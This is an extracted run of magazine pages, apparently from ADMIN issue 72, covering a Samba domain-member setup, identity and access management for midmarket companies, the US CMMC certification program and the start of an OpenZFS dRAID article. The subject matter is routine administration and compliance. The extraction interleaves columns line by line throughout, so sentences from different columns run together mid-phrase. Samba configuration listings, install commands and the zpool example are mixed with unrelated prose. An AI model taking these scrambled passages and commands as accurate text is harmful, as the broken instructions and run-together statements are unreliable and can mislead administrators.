The setup of a member server dif- member server as a member of the Samba does not evaluate all the
fers from the client setup described domain with share information at startup time.
above. For a client, you just need Only when a client wants to access
the System Security Services Dae- net ads join -U Administrator a share does Samba look for the as-
mon (SSSD) with Kerberos. The sociated information in the registry.
member on the other side connects and start the winbind and smb ser- Samba saves all its keys in HKLM/
to the domain with Samba’s Win- vices. You might get an error mes- Software/Samba/smbconf. Given suffi-
bind service without needing SSSD. sage stating that DNS registration cient rights, you can edit the registry
On the EL8 system (e.g., RHEL 8, did not work, but this response is with regedit over the LAN or with
Alma or Rocky Linux, CentOS not a big deal. Just enter the server the Linux samba-regedit CLI tool in
Stream 8), which I use as a domain manually in the ADS-integrated a legacy GTK design. If you want to
member, the necessary services DNS. After that, you can share fold- work with a registry, you can trans-
need to be set up first: ers on the member server and make fer an existing smb.conf to the regis-
them available as shares in the ADS try with net conf import.
dnf install samba samba-client U forest.
samba-winbind U
Conclusions
samba-winbind-clients U
Text or Registry
oddjob oddjob-mkhomedir On small and medium-sized net-
A Samba server usually stores its works with heterogeneous systems,
Adjust the smb.conf configuration configuration in the /etc/samba/smb. a Samba domain controller performs
for the member server (Listing 1). conf text file, making it difficult for well and ensures a smooth exchange
a Windows administrator to config- of files between the various client
Listing 1: smb.conf for Member Server ure Samba services. Alternatively, systems. In this article, I looked at
[global] the service can save all or part of as many solutions as possible for
realm = <ADS Realm> its configuration in a registry. This different distributions. Of course,
security = ADS function is often used in Samba the whole thing works on a Mac,
template shell = /bin/bash clusters. For example, in the domain on Windows, and on Linux, even
winbind enum groups = Yes setup described here, this means though I did not go into the details
winbind enum users = Yes that an administrator can customize of setting up an AD connection for a
winbind offline logon = Yes the Samba configuration of a Linux macOS client here. Q
winbind use default domain = Yes
server with the registry editor while
workgroup = <AD Workgroup Name>
working on a Windows workstation.
idmap config * : rangesize = 1000000
To put the complete configuration of Info
idmap config * : range = 100000-19999999
idmap config * : backend = autorid
a Samba server into the registry, you [1] Microsoft GUI Tools (RSAT):
... need an /etc/samba/smb.conf with [https://www.microsoft.com/en-us/
exactly two lines: download/details.aspx?id=45520]

74 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
N U TS A N D B O LTS Midmarket IAM

IAM for midmarket companies

Spoiled for Choice


We look at the roll of identity and access management in midmarket organizations. By Martin Kuppinger

Up to now, identity and access and applications; and, last but not specialized solutions for business ap-
management (IAM) has mainly least, administrative efficiency. plications show up, like SAP (e.g., SAP
been the domain of larger orga- The popular definition of the midmar- Access Control).
nizations, but it is important for ket includes medium-sized compa-
organizations of all sizes to manage nies with 51 to 1,000 employees and New Requirements Make
digital identities (not only of their larger medium-sized companies with
employees) and their access authori- 1,001 to 10,000 employees. In the
IAM Essential
zations in an efficient and effective larger midmarket, genuine IAM infra- However, these products are not up to
way. However, a chronic shortage of structures are very often already in the task in most cases, not least be-
personnel in the midmarket makes place for managing users and access cause requirements are growing and IT
it crucial to define their own IAM authorizations (IGA, identity gover- environments are changing. To begin
requirements precisely and select nance and administration), for access with, every organization is a potential
the right providers. control (access management with au- target for cyberattacks. Attackers are
IAM has the reputation of being thentication and identity federation), always looking to gain control of user
complex; this opinion is sometimes and in some cases, for monitoring accounts to steal data, distribute mal-
justified, but by no means always and controlling access by highly privi- ware, or carry out attacks. However,
true. This rumored, presumed, or leged users (PAM, privileged access that is only one aspect, because IT
perceived complexity, together with management). landscapes are changing in small and
what are typically small IT teams Smaller companies, on the other hand, mid-sized enterprises (SMEs) because
in the midmarket, often make orga- often have only technical administra- of the increasing use of cloud services
Photo by Robert Anasch on Unsplash

nizations reluctant to venture into tion tools, for example, the Quest Ac- with a tendency to use more services
the discussion. However, IAM is tive Roles server for Microsoft Active overall – often for specialized tasks.
important for many reasons: secu- Directory (AD). IT managers then tend For each of these services, managing
rity; regulatory compliance; more to manage permissions in applica- users and permissions securely is
efficient processes for employees, tions interlocked with Active Directory important.
business partners, and customers; in AD groups while managing other Additionally, the role of Active Di-
simple yet secure access to systems applications manually. Sometimes rectory, used in most midmarket

76 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Midmarket IAM N U TS A N D B O LTS

companies, is changing. After the The topic of Industry 4.0 (conver- management for technical identity
introduction of Microsoft 365, compa- gence of information and operational provisioning, with the creation,
nies started using Azure Active Direc- technology systems for seamless modification, and deletion of user
tory (AAD) and Microsoft Entra [1], generation, analysis, and communi- accounts in target systems, comple-
which meant that, for what is often cation of data) is also directly related mented by support for access gov-
a long transition period, two central to IAM – on the one hand for access ernance (e.g., the recertification
services are combined and managed, control in the manufacturing sec- of authorizations). These are core
increasing the complexity that IAM tor and on the other hand to secure areas of IAM. Within IGA, however,
can help reduce. business systems that interface with it is primarily about having stan-
One issue that no midmarket com- and reduce the risk of attacks on dardized processes for the essential
pany in any sector can afford to production systems. tasks (e.g., creating and changing
underestimate, but especially in Most importantly, it’s not just about departments and deleting users),
the manufacturing industry, is the employees, but also access by (and supporting a simple authorization
demand from important customers applications for) business partners request, and checking and being able
for certification in line with the ISO and, especially, customers and to connect to critical target systems.
2700x standards. These standards consumers. Virtually all organiza- For midsize companies in particular,
also include working IAM. Even if the tions are facing growing demand to connecting can turn into a challenge
requirement can be covered in a basic provide more digital services, which because many vendors support com-
way with manual processes, certifi- are increasingly at the core of busi- mon business applications for large
cation can be achieved more easily ness models. The digital identities enterprises but not midsize solu-
if organizations use suitable IAM of customers and consumers need to tions. Providers specializing in SMEs
applications. be managed, as does employee ac- (e.g., Tenfold) can be an alternative.
This situation is even more true for cess to these services. Access management for centralized
companies in the critical infrastruc- control of authentication; support for
ture sector, where the requirements The Right Amount of IAM multifactor authentication and, if pos-
for IT security management, and sible, login without passwords; and
therefore also for user and authoriza-
for the Midmarket interaction with target applications is
tion management, have been signifi- How much IAM is feasible for the also a must. This integration requires
cantly tightened. Following the Ger- midmarket and which aspects of IAM not only support for common identity
man KRITIS (critical infrastructure) are genuinely needed? IAM is very federation standards such as OAuth,
revisions, the focus has also increas- diverse, as a look at reference archi- OpenID Connect [2], and security
ingly shifted to medium-sized compa- tectures shows (Figure 1), but what assertion markup language (SAML),
nies, where working IAM has become parts of it do SMEs really need? but also web access management for
practically mandatory. IGA includes tools for user lifecycle legacy applications.

Figure 1: The IAM reference architecture shows the variety of related topics. SMEs need to think carefully about what they want to
implement and what they can implement.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 77
N U TS A N D B O LTS Midmarket IAM

In addition to these building blocks, a sensible overall solution is created are fine as long as the IT manager
admins also need to think about a is to make a roadmap – a precise defi- has a clear plan for the step-by-step
suitable customer IAM (CIAM) ap- nition of where the company wants to implementation of the other func-
plication, especially where companies go and which projects are part of the tions, too.
are developing many of their own dig- IAM program.
ital services. Which products are best The first step for IT managers is to Choosing the Right Provider
suited here depends heavily on the consider whether individual solu-
application scenarios. Where many tions or a suite of products are more As is already clear from the list of
custom applications are created, suitable to cover as many areas vendors in the examples above,
developer-focused tools that provide as possible from a single source. many companies supply platforms
APIs for identity functions such as Microsoft and Okta, but also Em- suitable for SMEs. Depending on
user registration and authentication powerID or N8 Identity, are some your specific requirements, though,
make the most sense (e.g., Okta [3] of the vendors that cover multiple you might need to turn to large-
and Auth0 [4]). functional areas in a comparatively scale, leading IAM providers. Where
The use of PAM in SMEs is also lean application. companies develop digital services
important, although nowhere near On the other hand, specialists in of high complexity, ForgeRock [6]
as widespread. However, some of each of the sub-segments are highly is an interesting option, especially
today’s IAM offerings offer integrated suitable for SMEs. When it comes in terms of CIAM requirements. For
PAM features, at least for basic func- to access management in particular, complex regulatory requirements,
tions. Some PAM providers are in the many cloud services beyond Micro- market-leading IGA vendors such as
market, such as Delinea, but also soft and Okta can be easily imple- SailPoint [7], One Identity [8], or
smaller specialists who have compar- mented. In addition to One Identity IBM are relevant options, even for
atively lean and easy-to-implement and OneLogin or Ping Identity are the smaller midmarket.
products in their portfolio. Some European providers such as Nevis, In addition to the target image is the
of the vendors in the market, such Ergon, United Security Providers, or matter of defining your own require-
as Microsoft or EmpowerID [5], of- Ilex. A number of IGA manufactur- ments, both in terms of the required
fer several of these functional areas ers with many references in SMEs functionality and the target systems
from a single source in an integrated include European providers such as to be connected. This dataset can
platform. Omada or Beta Systems, on top of then be used to compare providers.
SME specialists such as Tenfold or Taking a closer look at the products
Planning IAM Carefully OGiTiX. and having them demonstrated is also
In terms of sequence, the typical important to understand whether they
Each of the topics mentioned above starting points are either access meet the requirements and what the
is a project in its own right, which management to enable secure user internal IT team can do to help.
makes it important to plan the in- access by multifactor authentica- In essence, the providers can be di-
troduction or modernization of IAM tion and identity federation or IGA vided into five categories (Figure 2):
carefully and not take on too much. for basic lifecycle and authoriza- Q Cloud-integrated solutions from
Of course, the only way to ensure that tion management functions. Both the major cloud providers: Both

Figure 2: The focal areas of use of different types of IAM tools, looking at criticality and complexity of requirements.

78 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Midmarket IAM N U TS A N D B O LTS

Microsoft and Google offer IAM recommend doing detailed research, recertification instead of sophisti-
functionality in tight integration whether on the Internet or by call- cated functions are usually the better
with their respective Office plat- ing in an analyst to identify suitable choice. Also important is for manu-
forms. These platforms can also providers. facturers to include standard features,
provide the foundation for organi- Different applications are required such as predefined processes and
zation-wide IAM, especially in the as a function of the complexity and reports. References in the SME sector
case of Microsoft with its coverage criticality (i.e., the regulatory require- are also an important criterion.
of all major IAM functional areas. ments in particular). Where regula- Additionally, those responsible for
Q Plain vanilla identity as a service tory pressure is high and environ- IT should be supported, both in the
(IDaaS) (i.e., IAM products from ments are complex, (e.g., in KRITIS- selection of products and in project
the cloud). These solutions are now relevant companies), classic IAM or implementation, by suitable partners,
offered by almost all IAM vendors IDaaS from established providers is who – depending on the phase – offer
and have the advantage that the more in demand; otherwise, cloud- market knowledge or implementation
overhead required for setup, cus- integrated or specialist products for expertise, especially in SMEs. If you
tomization, and operation is sig- SMEs, for example, might be the bet- get it right and the setup is carefully
nificantly lower than for traditional ter choice. considered, IAM is feasible and con-
local tools. This solution also makes The two most important criteria for trollable even for medium-sized busi-
applications that were previously selection are defining your own re- nesses, where IAM is more important
considered too complex for the quirements and taking the time to than ever. Q
midmarket as on-premises variants ensure a good overview of the mar-
an option in this market segment. ket. You can then select the products,
Q IAM systems in the various sub- check them against your require- Info
segments that can be used locally ments, view demos, and, if necessary, [1] Microsoft Entra:
and that bundle multiple functions perform a proof of concept. [https://www.microsoft.com/en-us/security/
or are generally comparatively blog/2022/05/31/secure-access-for-a-
simple and lean in use. Conclusions connected-worldmeet-microsoft-entra/]
Q Complementary solutions for man- [2] OpenID Connect:
aging Azure AD and Entra and on- Because IAM projects are costly, IT https://openid.net/connect/
premises AD, where the vast ma- managers need to invest both time [3] Okta: https://www.okta.com
jority of target applications interact and money to identify the right prod- [4] Auth0: https://auth0.com
with these systems anyway. uct. One thing is certain: Mistakes [5] EmpowerID: https://www.empowerid.com
Q Specialized IAM with a midmarket in terms of product selection are far [6] ForgeRock: https://www.forgerock.com
focus, often characterized by the more time-consuming and expensive [7] SailPoint: https://www.sailpoint.com
fact that it also has many inter- than well-planned and -executed [8] One Identity: https://www.oneidentity.com
faces to typical business applica- product selection. When defining
tions in the midmarket. requirements, it is important to have
The IAM market is very large, so I realistic goals. What is really needed Author
can only list the vendors by way of and what is manageable? Simple Martin Kuppinger is the founder of and Principal
example at this point. In any case, I authorization models and a simple Analyst at KuppingerCole Analysts AG.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 79
N U TS A N D B O LTS CMMC: US Cybersecurity Model

Understanding Cybersecurity Maturity Model Certification

Ready, Steady, …
United States Cybersecurity Maturity Model Certification will be required by mid-2023 to handle controlled
unclassified information and win federal contracts, but it can also help minimize business risk and keep
information out of the hands of adversaries. By Christopher J. Cowen

The US Department of Defense (DoD intellectual property and the sensitive Acquisition Regulation Supplement
or the Department) created the Cyber- information of US industrial sectors (DFARS) clause 252.204-7012 [2] in
security Maturity Model Certification from malicious cyber activity. The subcontracts for which subcontract
(CMMC) program to add a compre- aggregate loss of intellectual property performance will involve covered
hensive and scalable certification and certain unclassified informa- defense information (DoD CUI).
process to verify the implementation tion from the DoD supply chain can DFARS provides acquisition regula-
of industry practices that achieve a threaten US economic and national tions that are specific to the DoD and
cybersecurity maturity level. CMMC security by undercutting technical outlines regulations to which DoD
is designed to provide assurance to advantages and innovation and sig- government acquisition officials,
departments and agencies that the de- nificantly increasing risk to national contractors, and subcontractors must
fense industrial base (DIB) contractor security. adhere when doing business with the
can adequately protect sensitive un- To address these concerns, the DoD DoD. However, this DFARS clause
classified information such as federal issued an interim rule [1] September does not provide the department or
contract information and controlled 2020 intended to create a DoD assess- agency contracting this work suf-
unclassified information (CUI). The ment methodology and CMMC frame- ficient insights with respect to the
US government is concerned with work to assess a contractor’s cyberse- cybersecurity posture of DIB compa-
ensuring that the data and informa- curity posture. By issuing the interim nies throughout the multitier supply
tion their contractors receive is stored rule, the US government is seeking to chain for any given program or tech-
and used safely. This government- understand what requirements and nology development effort.
Photo by Braden Collum on Unsplash

furnished information is more com- business practices contractors incor- Given the size and scale of the DIB
monly known as GFI. porate to protect their unclassified sector, the DoD cannot scale its
Of great concern is the potential that information systems and the data that organic cybersecurity assessment
government-furnished information is housed on those systems from a capability to conduct on-site assess-
will escape into the wild. The US threat actor. ments of approximately 220,000 DoD
government wants to protect itself The US currently requires DoD con- contractors every three years. As
and its citizens against the theft of tractors to include Defense Federal a result, the Department’s organic

80 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
CMMC: US Cybersecurity Model N U TS A N D B O LTS

assessment capability is best suited CMMC Framework company must achieve the CMMC
for conducting targeted assessments level certification required as a
for a subset of DoD contractors that The framework has three main key condition of contract award.
support prioritized programs, tech- features:
nology development efforts, or both. Tiered Model. CMMC requires that CMMC in Depth
CMMC addresses the challenges of companies entrusted with national
contractor assessment capabilities by security information implement cy- CMMC is currently on its second iter-
partnering with an independent orga- bersecurity standards at progressively ation, CMMC 2.0. The prior iteration
nization that will accredit and oversee advanced levels, depending on the of CMMC was CMMC 1.0, which built
third-party assessment and conduct type and sensitivity of the informa- a framework of four elements: secu-
on-site assessments of DoD contrac- tion. The program also sets forth the rity domains, capabilities, practices,
tors throughout their multitier sup- process for information flow down to and processes. When combined, they
ply chain contract. The cost of these subcontractors. built best practices for the protection
CMMC assessments will be driven Assessment Requirement. CMMC as- of an organization and associated
by multiple factors, including market sessments allow the Department to federal contract information and CUI.
forces, the size and complexity of the verify the implementation of clear CMMC 1.0 had five cybersecurity ma-
network or enclaves under assess- cybersecurity standards. turity levels (1-5) that composed the
ment, and the CMMC level. Later I Implementation Through Contracts. CMMC framework, with level 1 being
will talk about the plans to enforce Once CMMC is fully implemented, the least mature and level 5 the most
CMMC. certain DoD contractors that handle mature.
sensitive unclassified DoD informa- The CMMC 1.0 framework consisted
What Material Falls Within tion will be required to achieve a par- of 17 cybersecurity domains. A do-
ticular CMMC level as a condition of main is a distinct group of security
CMMC? contract award. practices that have similar attributes
In a simplified definition, only un- Building on the National Institute of and are key to the protection of
classified data and information that Standards and Technology special federal contract information and
falls below the classified category publication (NIST SP) 800-171 (DoD CUI, either individually or in com-
falls within the purview of CMMC. Assessment Methodology) [3], the bination. Each domain comprises
Classified data and information CMMC framework adds a compre- several capabilities an organization
have distinct processes and guide- hensive and scalable certification is expected to achieve to ensure that
lines that contractors must adhere to, element to verify the implementa- cybersecurity and the protection of
to possess these types of materials. tion of processes and practices as- federal contract information and
Classified data not covered by CMMC sociated with the achievement of a CUI is sustainable. Capabilities are a
is secret (S), top secret (TS), or top cybersecurity maturity level. CMMC combination of practices, processes,
secret sensitive compartmented in- is designed to provide increased as- skills, knowledge, tools, and behav-
formation (TS-SCI). surance to the Department that a DIB iors, which when working together
Within the unclassified data and contractor can adequately protect enable an organization to protect
information category of material are sensitive unclassified information federal contract information and
distinct classifications of data that re- (i.e., CUI) at a level commensurate CUI. In total (at level 5) the CMMC
quire CMMC protection: with the risk, accounting for infor- framework identifies 171 practices
Q CUI Assets process, store, or trans- mation flow down to its subcontrac- associated with the 17 security do-
mit CUI. tors in a multitier supply chain. mains and mapped across the five
Q Security Protection Assets provide Implementation of the CMMC frame- maturity levels.
functions or capabilities to include work is intended to solve the follow- Practices applied at maturity levels
people, technology, and facilities. ing problems: 1 and 2 have been referenced from
Q Contractor Risk Managed Assets Q Verification of a contractor’s Federal Acquisition Regulation (FAR)
are capable of, but not intended cybersecurity posture. DIB com- 52.204-21 [4] for the basic safeguarding
to, process, store, or transmit CUI panies self-attest that they will of covered contractor information sys-
because of the security policy, pro- implement the requirements in tems applied to the protection of federal
cedures, and practices in place. NIST SP 800-171 on submission of contract information. Practices applied
Q Specialized Assets are government their contract offer. at levels 3, 4, and 5 are referenced from
property, industrial Internet of Q DoD contractors that incon- DFARS 252.204-7012 [2] for the safe-
Things, supervisory control and sistently implement mandated guarding of covered defense informa-
data acquisition (SCADA) sys- system security requirements for tion and cyber-incident reporting. Most
tems, and restricted information safeguarding CUI. of the above framework and guidelines
systems or test equipment that Q Verification of a DIB contrac- carried over to CMMC 2.0 with the one
may handle CUI. tor’s cybersecurity posture. The big exception that CMMC 2.0 only has

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 81
N U TS A N D B O LTS CMMC: US Cybersecurity Model

three levels, as opposed to the five lev- of safeguarding sensitive information they need to thwart cyber threats
els of CMMC 1.0. while trying to simplify the CMMC while minimizing barriers to compli-
standard and providing additional ance with DoD requirements.
CMMC 2.0 clarity on cybersecurity regulatory,
policy, and contracting requirements. Figure 1 shows the difference be-
In March 2021, the DoD initiated an The US government believes this is tween CMMC versions 1.0 and 2.0.
internal review of CMMC’s imple- achieved by focusing the most ad- With the implementation of CMMC
mentation, informed by more than vanced cybersecurity standards and 2.0, the Department is introducing
850 public comments in response to third-party assessment requirements several key changes that build on
the interim DFARS rule. This compre- on companies supporting the high- CMMC 1.0 and refine the original pro-
hensive, programmatic assessment est priority programs and increasing gram requirements:
engaged cybersecurity and acquisition Department oversight of professional Q A streamlined model that focuses
leaders within DoD to refine policy and ethical standards in the assess- on the most critical requirements
and program implementation, and in ment ecosystem. and reduces the model from five
November 2021, the DoD announced The program is meant to ensure ac- to three compliance levels. This
CMMC 2.0 [5]. The view is that ver- countability for companies to imple- change aligns CMMC 2.0 with
sion 2.0 would achieve the primary ment cybersecurity standards while widely accepted standards and
goals that came out of this internal minimizing barriers to compliance uses NIST cybersecurity standards.
review: with DoD requirements, as well as Q Reliable assessments reduce as-
Q Safeguard sensitive information to instill a collaborative culture of cy- sessment costs and allow all com-
enable and protect the warfighter. bersecurity and cyber resilience and panies at level 1 (Foundational)
Q Dynamically enhance DIB cyberse- enhance public trust in the CMMC and a subset of companies at
curity to meet evolving threats. ecosystem, while increasing overall level 2 (Advanced) to demon-
Q Ensure accountability while mini- ease of execution. Jesse Salazar, Dep- strate compliance through self-as-
mizing barriers to compliance with uty Assistant Secretary of Defense for sessments. Higher accountability
DoD requirements. Industrial Policy, one of the leaders of increases oversight of professional
Q Contribute toward instilling a col- the CMMC effort, said [6]: and ethical standards of third-
laborative culture of cybersecurity CMMC 2.0 will dramatically party assessors.
and cyber resilience. strengthen the cybersecurity of the de- Q Flexible implementation encour-
Q Maintain public trust through high fense industrial base. By establishing ages a spirit of collaboration that
professional and ethical standards. a more collaborative relationship with allows companies, under certain
The enhanced CMMC 2.0 program industry, these updates will support limited circumstances, to make
maintains the program’s original goal businesses in adopting the practices plans of action and milestones

Figure 1: Key features of CMMC 2.0 compared with version 1.0.

82 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
CMMC: US Cybersecurity Model N U TS A N D B O LTS

(POA&Ms) to achieve certification. but that is subject to change during 2019). DFARS 252.204-7012 (Sep 2022),
The added flexibility and speed the CMMC 2.0 interim rule-making [https://www.acquisition.gov/dfars/252.
allow waivers to CMMC require- process. 204-7012-safeguarding-covered-defense-
ments under certain limited cir- Bostjanick also said recently [7] information-and-cyber-incident-reporting.]
cumstances. that the DoD is expected to permit [3] “What Is the NIST SP 800-171 and Who
POA&Ms only for the lowest-risk Needs to Follow It?” by Traci Spencer.
CMMC Is Coming security controls (i.e., those that are NIST, Oct 8, 2019,
worth just one point in the DoD’s as- [https://www.nist.gov/blogs/manufacturing-
Whether you like it or not, the DoD sessment scoring methodology). Fifty innovation-blog/what-nist-sp-800-171-and-
is planning to release an interim rule of the 110 security controls are worth who-needs-follow-it-0]
on the CMMC framework by May one point. That leaves 60 controls [4] Basic safeguarding of covered contractor
2023, according to Stacy Bostjanick, that are worth either three or five information systems. FAR 52.204-21 (Oct
director of the CMMC program for the points and must be met before a con- 2022), [https://www.acquisition.gov/far/
DoD [7]. CMMC will be enacted on tractor’s CMMC level 2 assessment. 52.204-21]
the day the interim rule is published, These 60 controls are both the most [5] “Strategic Direction for Cybersecurity
and CMMC requirements will start important for securing CUI and some Maturity Model Certification (CMMC)
to appear in DoD contracts by July of the most difficult to meet. Program.” US DoD release. Nov 4, 2021,
2023, 60 days after publication of the In short, although your organization [https://www.defense.gov/News/Releases/
interim rules. doesn’t have to achieve the highest Release/Article/2833006/strategic-
Doing nothing is not an option. As of possible assessment score by May direction-for-cybersecurity-maturity-
this writing, defense contractors have 2023, it should be on the cusp of do- model-certification-cmmc-program/]
little more than a year to become ing so by then. Your business risk is [6] “DOD launches CMMC 2.0 program; Jesse
CMMC compliant. If your company too high to be far behind the timeline Salazar quoted” by Jane Edwards. GovCon-
is still at the very beginning of this of your organization’s compliance Wire, Nov 5, 2021,
timeline, the time for action is now, journey. [https://www.govconwire.com/2021/11/
although you might be able to take dod-launches-cmmc-2-0-program/]
consolation on two fronts: Conclusion [7] “Stacy Bostjanick shares updated DoD
First, the time and effort needed to CMMC rollout schedule” by Summer Myatt.
achieve compliance will be different A company’s goal should not just GovConWire, May 20, 2022,
for every defense contractor. Variables be to achieve eligibility to win de- [https://www.govconwire.com/2022/05/
include your baseline cybersecurity fense contracts, but also to minimize dods-cmmc-director-stacy-bostjanick-
maturity level and the resources business risk and keep CUI out of shares-updated-rollout-schedule/]
and prioritization you can assign to the hands of adversaries. By get-
achieving compliance. Your organiza- ting started on your organization’s
tion might need less time to achieve compliance journey, you can achieve Author
and demonstrate compliance, or these objectives and ensure your Christopher J. Cowen is
you might be able to commit more company is ready for ramped-up currently a Senior Cyber
resources and energy than a typical federal enforcement of cybersecurity Security Analyst with the
contractor would and so make up for regulations. Q US Department of Defense
lost time. (contractor). He has
Second, under CMMC 2.0, it will be worked within informa-
permissible to sign DoD contracts with Info tion technology for more
a POA&M in place, which means your [1] Defense federal acquisition regula- than 20 years within both the corporate and
organization does not need to achieve tion supplement: assessing contrac- government spaces. He is currently focused
the highest assessment score possible tor implementation of cybersecurity on information security for nuclear facilities
by May 2023. However, in case that requirements (DFARS case 2019-D041). and critical infrastructure security. Cowen
lessens your sense of urgency, con- 85 Federal Register 61505 (Sep 2020), is a Certified Information Systems Security
sider that CMMC 2.0 will bring critical 18 p., [https://www.federalregister.gov/ Professional (CISSP), a Certified Ethical Hacker
changes to the reprieve that POA&Ms documents/2020/09/29/2020-21123/ (CEH), and a Certified Information Security
have historically offered. POA&Ms will defense-federal-acquisition-regulation Manager (CISM). He has been a featured speaker
most likely have time constraints. At supplement-assessing-contractor- all over the world and has written articles for
this point, it seems that contractors implementation-of] Cyber Defense Magazine and Cyber Security: A
will have 180 days to remediate secu- [2] Safeguarding covered defense informa- Peer-Reviewed Journal, among others. You can
rity gaps identified in their POA&Ms, tion and cyber incident reporting (Dec reach Chris at [chrisjcowen@yahoo.com].

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 83
N U TS A N D B O LTS dRAID

Introducing parity declustering RAID

Silverware
Declustered RAID decreases resilvering times, restoring a pool to full redundancy in a fraction of the time
over the traditional RAIDz. We look at OpenZFS, the first freely distributed open source solution to offer a
parity declustered RAID feature. By Petros Koutoupis

Fault tolerance has been at the RAID technology isn’t perfect. As drive Why Parity Declustering?
forefront of data protection since capacities increase and storage technol-
the dawn of computing. To this day, ogies move further away from movable When a traditional redundant array
admins continue to struggle with ef- components and closer to persistent fails and data needs to be rebuilt
ficient and reliable methods to main- memory, RAID is starting to show its to a spare drive, two major things
tain the consistency of stored data, age and limitations, which is why its occur:
either locally or remotely on a server algorithms continue to be improved. Q Data access performance drops
(or cloud storage pool) and keep Papers on declustering the parity of significantly. In parallel with user
searching for the best way to recover RAID 5 or 6 arrays date back to the read and write requests (which
from a failure, regardless of how di- early 1990s. The design aims to en- involve rebuilding the original data
sastrous that failure might be. hance the recovery performance of stripe from the existing calculated
Some of the methods still being the array by shuffling data among all parities, consuming more process-
used today are considered ancient drives within the same array, includ- ing power), a background process
by today’s standards. Why replace ing its assigned spare drives, which is initiated to rebuild the original
something that continues to work? tend to sit idle until failure occurs. (and newly updated) data to the
One such technology is called RAID. Figure 2 showcases a very simplified designated spare drive(s). This
Initially, the acronym stood for re- logical layout of each stripe across process creates a bottleneck to the
dundant array of inexpensive disks, all participating volumes. In practice, spare drive.
but it was later reinvented to de- though, the logical layout is arranged Q As a result of both activities oc-
scribe a redundant array of indepen- randomly to distribute data chunks curring simultaneously, the re-
dent disks. more evenly over the drives (and covery process will take much
The idea of RAID was first conceived based on their logical offsets). It is longer to complete. Depending on
in 1987. The primary goal was to done in such a way that, regardless the user workload and capacity
scale multiple drives into a single of which drive fails, the workload sizes, we are talking about days,
Lead Image © Author, 123RF.com

volume and present it to the host as to recover from the failure is distrib- weeks, even months. In the in-
a single pool of storage. Depending uted uniformly across the remaining terim, however, you have the risk
on how the drives were structured, drives. Figure 3 highlights a simpli- of a secondary (or tertiary) drive
you also saw an added performance fied example of how this is exercised failing; depending on the RAID
or redundancy benefit. (See the box with the OpenZFS project, as dis- type, it can put your array into an
titled “RAID Recap.”) cussed later in this article. extremely vulnerable state – if not

84 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
dRAID N U TS A N D B O LTS

cripple the entire array and render reduced rebuild time, and when the (dRAID), was released in OpenZFS
your data unrecoverable. existing array is under a heavier user version 2.1 [2].
By leveraging parity declustering, workload, this matters. As an example, to configure a
all drives within the array, includ- single-parity dRAID volume with a
ing the spares, participate in the OpenZFS dRAID single spare volume on five drives,
data layout with specific regions of a you would use the zpool command-
stripe dedicated as the spare chunks. How does one take advantage of this line utility:
When the time comes to regenerate approach to data management? For-
and recover lost data because of a tunately, and fairly recently, in a joint # zpool create -f myvol2 U
drive failure, all drives participate vendor and community effort, the draid:3d:1s:5c /dev/sd[b-f]
in the recovery process and, in turn, OpenZFS [1] project recently intro-
do not bottleneck a single drive (i.e., duced parity declustering. The imple- In this example, if you want dual
the spare). This method means a mentation, called distributed RAID or triple parity, you would instead

RAID Recap
RAID allows you to pool multiple drives together to represent a single tains a single parity chunk per stripe. A RAID 6 volume is designed with
volume. Depending on how the drives are organized, you can unlock cer- two parity chunks per stripe, allowing it to sustain two drive failures.
tain features or advantages. For instance, depending on the RAID type, Although not the focus of this article, hybrid RAID types are worth a
performance can dramatically improve, especially as you stripe and mention. Typically hybrid types involve nesting one RAID type within
balance the data across multiple drives, thus removing the bottleneck of another. For instance, striping mirrored sets is considered RAID 10, but
using a single disk for all write and read operations. Again, depending on if the striping includes a single parity (e.g., RAID 5), it is referred to as
the RAID type, you can grow the storage capacity. RAID 50.
Most of the RAID algorithms do offer some form of redundancy that can RAID systems can be either hardware or software based. Once upon a
withstand a finite amount of drive failures. In such a situation, when a time, processing power was limited, and it was advantageous to rely on
drive fails, the array will continue to operate in a degraded mode until external hardware for creating and managing RAID arrays. As time pro-
you recover it by rebuilding the failed data to a spare drive. gressed, this approach became less significant. Server hardware grew
Most traditional RAID implementations use some form of striping or more powerful, and implementing RAID solutions became much easier
mirroring (Figure 1). With a mirror, one drive is essentially a byte-by- and less expensive through software with commodity storage drives
byte image of the other(s). Striping, on the other hand, retrieves data attached to the server. However, hardware-based, vendor-specific stor-
and writes or reads it across all drives of the array in a stripe. In this age arrays still exist, and they offer some additional fault tolerance and
method, data is written to the array in chunks, and collectively, all performance features that are advantageous in some settings.
chunks within a stripe define the array’s stripe size.
Common RAID types include:
RAID 0 – Disk striping. Data is written in chunks across all drives in a
stripe, typically organized in a round-robin fashion. Both read and write
operations access the data in the same way, and because data is con-
stantly being transferred to or from multiple drives, bottlenecks associ-
ated with reading and writing to a single drive are alleviated, and data
access performance is dramatically improved. However, RAID 0 does not
offer redundancy. If a single drive or drive sector fails, the entire array
fails or is immediately invalidated.
RAID 1 – Disk mirroring. In a RAID 1 array, one drive stores an exact rep-
lica of its companion drive, so if one drive fails, the second immediately
steps in to resume where the first left off. Write performance tends to
be half of a single drive because you are literally writing two copies of
the same dataset (one to each drive). If designed properly, however,
read performance can double through a mechanism called read balanc-
ing. Read requests can be split across both drives in the mirrored set so
that each drive does half the work to retrieve data.
RAID 5/6 – Redundancy. Here is where things get a bit more compli-
cated. RAID levels 5 and 6 are similar to RAID 0, except they offer a
form of redundancy. Across each stripe of chunks exists a chunk dedi-
cated to an XOR-calculated parity of all the other chunks within that
same stripe. This special chunk is then balanced across all drives in the
array, so that not one single drive will bear the burden of continuously
writing updates to the same drive(s) every time a stripe is updated.
These parity calculations make it possible to restore the original data
content when a drive fails or becomes unavailable. A RAID 5 volume con- Figure 1: A general outline of RAID levels 0, 1, and 5.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 85
N U TS A N D B O LTS dRAID

substitute draid with draid2 or draid3. pool and a single spare, the output do so is to take it offline by the stor-
The next colon-delimited field defines would look something like Listing 2. age subsystem in sysfs (in Linux):
the number of data drives (in this Notice that in the dRAID example, all
case, three), then the number of spare drives, including the spare, are active # echo offline >U
